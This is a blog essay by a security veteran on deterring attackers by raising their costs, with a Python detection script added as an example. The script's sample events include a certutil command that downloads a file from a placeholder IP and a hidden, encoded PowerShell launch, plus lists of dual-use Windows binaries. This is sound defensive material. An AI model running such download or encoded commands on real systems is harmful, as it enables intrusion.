Many years ago, I spoke at a @suitsandspooks panel in Washington, D.C. with some of the cybersecurity industry’s best and brightest minds. One of the topics addressed was the concept of active defense strategy in the commercial (private sector) world versus the public world. In those days the idea of ‘hacking back’ against a hostile, adversarial threat actor or group was discussed frequently, with some organizations and their leaders taking a more vocal stance (in both public and private sectors).
The panel was fantastic: Dmitri Alperovitch (CrowdStrike), Greg Hoglund, Jeff Carr, me, and moderated by Anup Ghosh. A smart group of guys all with strong opinions on the subject matter. The idea and execution of active defense measures and ‘hacking back’ varied – much like the assessments of the panelists themselves. I recall with fondness the panel of thinkers; not solely due to the fact that we were all younger and earlier on in our careers, but because of the passion with which each participant conveyed their opinions. I often think back on that panel, comparing those views to where our industry – and our world – are today.
In many respects, things have become more convoluted and challenging for the defender, and in some regards easier for the adversary. The world has also become increasingly dangerous as cyberspace and our daily lives (personal, professional, and otherwise) have continued to converge, introducing net new ways for adversarial threat actors great and small to widen the scope of their operations and advance their goals—all in alignment with their operational agendas and cyber warfare doctrines.
A New World
Ample examples of this were seen throughout the last three years of the global pandemic. Ransomware targeting of medical and biopharmaceutical organizations increased at an unprecedented rate, while the threat of third-party compromise and supply chain infiltration (compromise, exploitation) became a reality: a clear and present danger affecting organizations the world over. The reality of our individual and collective vulnerability was driven home during a time of global duress, in ways many would previously have considered out of bounds, as the predatory behavior of adversarial threat actors and groups increased dramatically.
Furthermore, the domains of conventional warfare and cyber became real in the hearts and minds of many the world over when the war between Russia and Ukraine began and distributed denial of service and other forms of cyber attack were reported through trade and traditional media on a regular basis; surprising to some and less so to others, as the fifth domain of warfare (cyber) has been discussed at length for decades.
The Defender’s Plight
During the @suitsandspooks panel, the concepts of active defense and ‘hacking back’ were expounded upon, discussed, debated, and in some cases, cautioned against. In those days (and I believe this is still true today), it was neither practical nor pragmatic for private sector organizations or entities (assuming they did not have the backing of the federal government) to actively target, attack, and ‘hack back’ the adversaries targeting or successfully exploiting them.
There are many exceptionally good reasons for this stance, from the inability to be sure that the infrastructure and assets used by the adversary are actually theirs (rather than someone’s grandmother’s PC or an unsuspecting organization’s infrastructure), to those involving national/international law and warfare doctrine.
There is still a great need to deter—in the most active sense possible—the advancements and agendas of adversarial threat actors and groups once they are detected and identified.
You may be asking yourself how this can be achieved without taking the most direct approach possible in a tit for tat fashion.
The answer lies in imposing costs on an adversarial threat actor as a form of deterrent.
This is the Way
Considerations before your organization brings the fight to the adversary through increased costs
I have a friend, Andrew Thompson (@ImposeCost), who talks a lot about these imposed costs: that the best deterrent to adversarial threat groups and actors is to make their attempts, their operations, and their campaigns as costly to carry out as possible—in order to make them really consider what they are doing, who they are targeting, and why they are doing so.
To begin with, it takes more than just the application of the latest and greatest technology, which should come as no surprise to most of you (although at times this can make all the difference in the world). Here’s my list:
7 keys to introduce and increase costs with prejudice for adversarial threat actors:
- Know and understand your organization. What does your organization do? What does it produce (in the form of products or services)? What makes it unique? Knowing your organization’s business (or mission depending on the type of organization that you are a part of) will aid you in finding the best ways to introduce and increase costs with prejudice tactically and strategically for those adversaries targeting the organization.
- Know and understand your assets. What does your organization own in terms of assets? This should include more than those which communicate with and are reachable via the Internet. Understanding your organization’s asset profile will aid you in understanding where and how to prioritize your efforts related to the introduction of cost and the intensity you will employ against adversaries. Remember, assets can and should include personnel – humans are often targeted, exploited, and compromised – so it is important to bear that in mind during the formulation of your organizational strategy related to engaging and deterring adversaries. Developing a deep understanding of your organization’s assets and their vulnerability to exploitation is crucial in developing a solid strategy to introduce and increase the costs of an adversarial threat actor group.
- Learn and understand what makes your organization a target. What is it about your organization (see #1) that makes it special or attractive to adversarial threat actors? Is it something you own, produce, promote, or fulfill? Is it intellectual capital contained within key human assets? Learn and understand what makes your organization a target. Discover what makes you attractive and in the course of collaborating with those parties chartered to manage the overarching risk of the organization, aid in the development of tactics and strategies that are tailored to address your organizational target profile.
- Know whether your organization is a target of opportunity or intent.
  - Do you know what type of target you are in the eyes of an adversarial threat actor group?
  - What vertical or sector are you a part of?
  - What does your organization do?
  - Are you a target of opportunity such as those seen in waterholing attacks?
  - Could your organization inadvertently aid an adversarial threat actor in advancing their agendas and goals toward primary targets of interest?
  - Is your organization – by virtue of what you know about it, its business, what makes it unique, and what it produces – a target of interest or a likely target of interest of adversarial threat actor groups?

  Learning as much as you can and developing a deep understanding of your organization and its peers in your industry vertical guides you in developing a strategy that raises the costs and stakes of adversarial threat actors targeting your organization.
- Learn to live off the land like your adversaries do. Are you aware of the native tools, applications, and utilities found within infrastructure and operating systems throughout the world? They enable your sysadmins and DevOps personnel, and equally your adversaries, to advance toward their short- and long-term goals, and their use may go unnoticed whether local to a host or across the network.
Many such tools, applications, and utilities enable adversaries to move with impunity due to their pedestrian nature and presence within networks. However, not recognizing, detecting, and responding to their use can mean the difference between stopping an adversarial motion early in its tracks and a breach with full exfiltration over time. As a result, learning to live off the land like your adversaries is paramount in structuring technical control-driven plans and strategic approaches designed to introduce and increase costs of adversarial threat actor groups.
- Total visibility within your organization via thorough instrumentation. Do you have the ability to zero in on any event, anywhere throughout your organization, in order to start preliminary investigations and beyond? Do you have total coverage of all aspects of your organization’s infrastructure? Can you delve into its endpoints (laptops, desktops, servers, mobile devices, etc.) and conduct investigations while ensuring persistence on those devices anywhere in the world? Are your off-premises (cloud) workloads properly instrumented, managed, and monitored? Achieving this degree of visibility takes time, careful planning, vision, and commitment. There are several ways to achieve it, through heterogeneous technology offerings or homogeneous suites. The importance of achieving this degree of visibility – and the insights gained – with respect to triaging alerts, events, and incidents cannot be stressed enough.
- Strive toward quality and a culture that respects and demands vigilance. Does your organization take advanced threats and adversarial threat groups seriously enough? Do your leadership and stakeholders understand the importance of points 1-6? If not, think about how you and your peers, subordinates, and employees can convey the importance of these points and the criticality of imposing an increasing cost on adversarial threat actor groups targeting your organization. Compelling yourself, your colleagues, leadership, and stakeholders is critical in mitigating the threats posed by such actors and the risks presented to your organization.
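Points 5 and 6 above come down to recognizing native-tool use in the telemetry you already collect. The following is an added example, not code from the original post: a small triage routine that scores constructed process-creation events (Sysmon-style fields, simplified) for the patterns a defender watches for, namely dual-use binaries spawned by user applications, encoded command lines, and remote URLs on a native tool's command line. The field names, binary lists, and sample events are all assumptions made for the example.

```python
# Constructed sample process-creation events; invented for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws-017", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    {"host": "ws-017", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand QUFBQQ=="},
    {"host": "srv-db-02", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws-042", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt"},
    {"host": "ws-042", "parent": "outlook.exe", "image": "wscript.exe",
     "cmdline": "wscript.exe invoice.js"},
]

# Native binaries admins use every day that intruders also lean on (assumed list).
DUAL_USE = {"powershell.exe", "certutil.exe", "wscript.exe", "cscript.exe",
            "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe"}
# Parents that should rarely spawn an interpreter or download utility (assumed list).
USER_APP_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def score_event(ev):
    """Return (score, reasons) for one event; score 0 means nothing notable."""
    reasons = []
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"].lower()
    if image not in DUAL_USE:
        return 0, reasons
    reasons.append(f"dual-use binary {image}")
    if parent in USER_APP_PARENTS:
        reasons.append(f"spawned by user application {parent}")
    if "-encodedcommand" in cmd or " -enc " in cmd or " -e " in cmd:
        reasons.append("encoded PowerShell command line")
    if "http://" in cmd or "https://" in cmd:
        reasons.append("remote URL on the command line of a native tool")
    return len(reasons), reasons


def triage(events, threshold=2):
    """Return (score, host, image, reasons) for events at or above threshold, highest first.
    A lone dual-use binary scores 1 and stays below the default threshold, which keeps
    routine admin use out of the queue while stacking indicators surfaces real outliers."""
    hits = [(s, ev["host"], ev["image"], r)
            for ev in events for s, r in [score_event(ev)] if s >= threshold]
    return sorted(hits, key=lambda h: h[0], reverse=True)  # stable: ties keep log order


if __name__ == "__main__":
    for score, host, image, reasons in triage(SAMPLE_EVENTS):
        print(f"[{score}] {host} {image}: " + "; ".join(reasons))
```

The threshold and lists are where organizational knowledge (points 1 through 4) feeds in: a build server that legitimately runs certutil gets its own baseline rather than a blanket exception.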
At this point you may be asking where your organization would begin with respect to the seven points above. If you are asking this question, rest assured that you and your organization are neither unique nor alone. My recommendation to any organization in this position would first be that it knows itself in aggregate. Every stakeholder with any modicum of responsibility or charter for defending and securing the organization should be fluent, to the degree their role requires, in the areas outlined in point 1 above: know thy organization! This will help you take the first, and perhaps most difficult, step in the process:
Recognize and accept that it’s highly probable (depending upon the type of business) your organization is—or soon will be—a target of motivated, often very well-funded, adversarial threat actors.
This first step is critical in setting in motion an active defense strategy that sees the totality of the organization’s resources used in concert to make it the hardest target for any adversary that may seek it out. This will require unanimity among stakeholders from across the organization’s executive leadership down to the rank and file. A uniform approach that promotes a culture of vigilance and attention to detail can and often does make the difference in whether an organization remains a hard target that can defend itself and vigorously mitigate attacks – or finds itself a victim.
So, the first step in introducing increasing costs to present or potential adversarial threat actors is to gain a crisp understanding of the organization and its business. Achieving consensus among stakeholders to reorient the organization’s culture toward an active defensive strategy against threats and adversarial threat actors is not a simple proposition. It will require good strategy, diplomacy, and a deep understanding of the organization’s approach to risk management and posture. Communication of facts in a non-hyperbolic fashion will aid you and your organization in moving toward that goal.
Many technology investments beyond those related to cybersecurity can and do provide a wealth of information and data to savvy organizations regarding the state and posture of the organization and the patterns of use of systems, assets, and users associated with and attached to the organization’s network infrastructure, on and off-premises. From route/switch (and associated technologies) to server, storage, cloud, endpoint, and beyond, almost every form of ‘enterprise’ technology affords some form of native logging and/or cybersecurity feature/functionality.
It is imperative that organizations fully leverage those native aspects of their non-cybersecurity technology investments as a complement to their cyber-specific technology investments. For example, if your organization is a Microsoft O365 customer at either the E3 or E5 licensing tier, you have access to a variety of vital cybersecurity technology and log sources crucial in increasing the costs associated with adversarial attacks, operations, and campaigns.
More so than ever before, it is critical that we introduce and impose more costs on any and all adversaries that threaten our way of life and our ability to conduct our business. The world has changed dramatically since I sat and took part in that panel so many years ago. However, the importance of that debate (and those that were spawned from it) cannot be underscored enough. If we hope to regain and keep the competitive edge against global adversarial threat actor groups, we must give these bad actors pause before continuing their attacks, operations, and campaigns. We must take it upon ourselves to impose as much cost on them and raise the stakes as far as our resources allow, knowing that in doing so we can deter and stop them. A failure to do so is an invitation for bad actors to continue with impunity. The world and our way of life cannot afford this ad infinitum.
Author Will Gragido
Will began his tech journey in the early ‘90s when he left college and joined the United States Marine Corps. Will moved quickly (as Marines do) into the emerging world of data communications, so he knows a few things about internetworking, information security, communications intelligence, and information warfare. Throughout his career, Will has been a leader for many of Cybersecurity’s outstanding services, products, and threat research intel organizations, including International Network Services, Internet Security Systems (ISS), Damballa, Cassandra Security, TippingPoint DV Labs, RSA NetWitness FirstWatch, Digital Shadows, Hyas, and Prevailion. A three-time published author, Will’s written on cybercrime, espionage, and threat forecasting (with a fourth book in the works). He’s also a keynote-level speaker at tier-one conferences globally, and sat on the CFP selection board for threat research and malware for the RSAC USA conference. Will currently lives in the greater Austin, TX area with his wife, their two youngest children, and Chuy (the dog).